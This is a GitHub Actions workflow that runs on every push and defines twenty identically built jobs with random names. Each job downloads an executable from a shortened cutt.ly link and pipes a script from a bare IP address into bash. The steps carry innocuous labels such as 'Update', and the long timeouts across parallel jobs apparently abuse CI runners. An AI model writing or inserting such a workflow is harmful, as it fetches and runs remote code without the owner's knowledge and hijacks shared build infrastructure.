name: nezomi
on: push
jobs:
  xakaye:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npysx.php?a=jude | bash -
  duhaja:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npysx.php?a=jude | bash -
  hucada:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npysx.php?a=jude | bash -
  nubuzisa:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npysx.php?a=jude | bash -
  vakaye:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npysx.php?a=jude | bash -
  lipeju:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npysx.php?a=jude | bash -
  berurecu:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npysx.php?a=jude | bash -
  hahezuza:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npysx.php?a=jude | bash -
  zokize:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npysx.php?a=jude | bash -
  mifiru:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npysx.php?a=jude | bash -
  xunukaki:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npysx.php?a=jude | bash -
  mafefa:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npysx.php?a=jude | bash -
  lopegi:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npysx.php?a=jude | bash -
  bojere:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npysx.php?a=jude | bash -
  belafu:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npysx.php?a=jude | bash -
  pitiwo:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npysx.php?a=jude | bash -
  jaxalonu:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npysx.php?a=jude | bash -
  fuwipe:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npysx.php?a=jude | bash -
  viyema:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npysx.php?a=jude | bash -
  vohefu:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.172.204.182/mandalorian/npysx.php?a=jude | bash -
